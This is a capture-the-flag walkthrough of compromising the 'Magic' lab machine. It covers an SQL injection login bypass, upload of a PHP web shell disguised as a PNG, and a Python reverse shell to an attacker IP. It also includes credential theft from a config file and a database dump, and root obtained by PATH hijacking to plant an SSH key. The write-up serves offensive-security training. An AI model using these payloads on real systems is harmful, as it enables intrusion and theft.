Enumeration

  1. Only two ports are open:
nmap -A -T5 -Pn -oN initial-nmap-scan 10.10.10.185

# Nmap 7.80 scan initiated Sat Apr 18 22:30:30 2020 as: nmap -A -T5 -Pn -oN initial-nmap-scan 10.10.10.185
Warning: 10.10.10.185 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.185
Host is up (0.048s latency).
Not shown: 971 closed ports, 27 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 18 22:30:44 2020 -- 1 IP address (1 host up) scanned in 14.23 seconds

  1. Page at http://10.10.10.185 shows some images catalog. It also mentioned that you need to login to upload the images.

  2. Images are located in a static folder like http://10.10.10.185/images/uploads/*.jpeg

  3. Scanned the box with gobuster and discovered few other pages:

gobuster dir -u http://10.10.10.185/ -x php -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 200 -o initial-gobuster-scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.185/
[+] Threads:        200
[+] Wordlist:       /usr/share/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/09/06 12:14:25 Starting gobuster
===============================================================
/images (Status: 301)
/assets (Status: 301)
/upload.php (Status: 302)
/logout.php (Status: 302)
/login.php (Status: 200)
/index.php (Status: 200)
/server-status (Status: 403)

Foothold

  1. Back to http://10.10.10.185/login.php and try SQLi:
username: ' or 1=1; -- -
password: ' or 1=1; -- -

  1. And we got in! Page redirected to http://10.10.10.185/upload.php. But trying to upload any web shell failed with alert: “Sorry, only JPG, JPEG & PNG files are allowed.”

  2. We need to confort this. Get PHP shell from https://github.com/jgor/php-jpeg-shell/raw/master/shell.php, rename it to shell.php.png and upload completes without any complains. Nice!

  3. From main page review we know upload folder location: http://10.10.10.185/images/uploads/. Try to open http://10.10.10.185/images/uploads/shell.php.png and it shows command input ready to execute.

  4. Start a listener:

nc -lnvp 4444
  1. Execute reverse shell from WEB PHP shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  1. And we got a shell!
www-data@ubuntu:~/Magic/images/uploads$ ls -la
ls -la
total 7400
drwxr-xr-x 2 www-data www-data    4096 Apr 18 12:40 .
drwxr-xr-x 4 www-data www-data    4096 Apr 14 05:04 ..
-rw-r--r-- 1 www-data www-data 5289209 Oct 22 00:44 7.jpg
-rw-r--r-- 1 www-data www-data 1455770 Oct 22 01:02 giphy.gif
-rw-r--r-- 1 www-data www-data   25290 Apr 18 12:07 kibers.png
-rw-r--r-- 1 www-data www-data  124278 Oct 22 01:01 logo.png
-rw-r--r-- 1 www-data www-data  100328 Oct 22 01:01 magic-1424x900.jpg
-rw-r--r-- 1 www-data www-data   37787 Oct 22 01:01 magic-hat_23-2147512156.jpg
-rw-r--r-- 1 www-data www-data   71417 Apr 18 12:39 magic-stwand.jpg
-rw-r--r-- 1 www-data www-data   67973 Oct 22 01:01 magic-wand.jpg
-rw-r--r-- 1 www-data www-data       8 Apr 18 12:30 r.png
-rw-r--r-- 1 www-data www-data     192 Apr 18 12:40 shell.php.png
-rw-r--r-- 1 www-data www-data     192 Apr 18 12:23 shell.png
-rw-r--r-- 1 root     root      361568 Apr 14 04:56 trx.jpg
www-data@ubuntu:~/Magic/images/uploads$

Getting user

  1. From /var/www/Magic/db.php5 file we got MySQL credentials:
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';
  1. Using these credentials it’s possible to create MySQL dump:
mysqldump --databases Magic -u theseus -p iamkingtheseus > magic.sql
  1. From SQL-dump we got admin credentials:
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
  1. Trying to reuse this password for user:
www-data@ubuntu:/dev/shm$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:~$ cat user.txt
cat user.txt
b0fdfe563dc8c153cebf91eab51166c2
theseus@ubuntu:~$ pwd
pwd
/home/theseus
theseus@ubuntu:~$ ls -la
ls -la
total 84
drwxr-xr-x 15 theseus theseus 4096 Apr 16 02:58 .
drwxr-xr-x  3 root    root    4096 Oct 15  2019 ..
lrwxrwxrwx  1 theseus theseus    9 Oct 21 03:26 .bash_history -> /dev/null
-rw-r--r--  1 theseus theseus  220 Oct 15  2019 .bash_logout
-rw-r--r--  1 theseus theseus   15 Oct 21 03:25 .bash_profile
-rw-r--r--  1 theseus theseus 3771 Oct 15  2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Mar 13 05:57 .cache
drwx------ 13 theseus theseus 4096 Oct 22 03:30 .config
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Desktop
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Documents
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Downloads
drwx------  3 theseus theseus 4096 Oct 21 03:49 .gnupg
-rw-------  1 theseus theseus 7334 Apr 15 23:50 .ICEauthority
drwx------  3 theseus theseus 4096 Oct 21 03:49 .local
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Music
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Pictures
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Public
drwx------  2 theseus theseus 4096 Oct 21 07:31 .ssh
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Templates
-r--------  1 theseus theseus   33 Apr 18 03:59 user.txt
drwxr-xr-x  2 theseus theseus 4096 Oct 22 03:28 Videos

Privilege escalation

  1. We have non-default SUID-file:
theseus@ubuntu:~$ ls -la /bin/sysinfo
-rwsr-x--- 1 root users 22040 Oct 21 03:45 /bin/sysinfo
  1. And we are in a right group to run it:
theseus@ubuntu:~$ id theseus
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
  1. Running it with ltrace revealed that free command runs without full path and so we can try to control the execution:
  • Create custom file:
theseus@ubuntu:/dev/shm$ cat free
#!/bin/sh
cat /root/root.txt
mkdir /root/.ssh
cat /home/theseus/.ssh/authorized_keys >> /root/.ssh/authorized_keys
  • Make it executable:
theseus@ubuntu:/dev/shm$ chmod +x free
  • Adjust PATH variable:
theseus@ubuntu:~$ export PATH=/dev/shm:$PATH

  1. Running sysinfo prints root’s hash and also copies our SSH key to root’s location.

  2. SSH in as root:

ssh -i id_rsa.pub root@10.10.10.185
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

29 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Sat Apr 18 14:47:23 2020 from 10.10.14.14
root@ubuntu:~# cat root.txt
392e6cbdbbb527970f14098612325fe7
root@ubuntu:~#